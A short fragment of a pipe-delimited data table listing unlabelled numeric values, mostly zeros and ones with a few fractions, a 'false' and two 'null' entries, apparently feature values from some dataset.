| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.333333
| false
| 0
| 0.333333
| 0.333333
| 1
| 0
| 1
| 0
| 0
| null | 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 1
| 1
| 1
| 0
| 0
| 7
|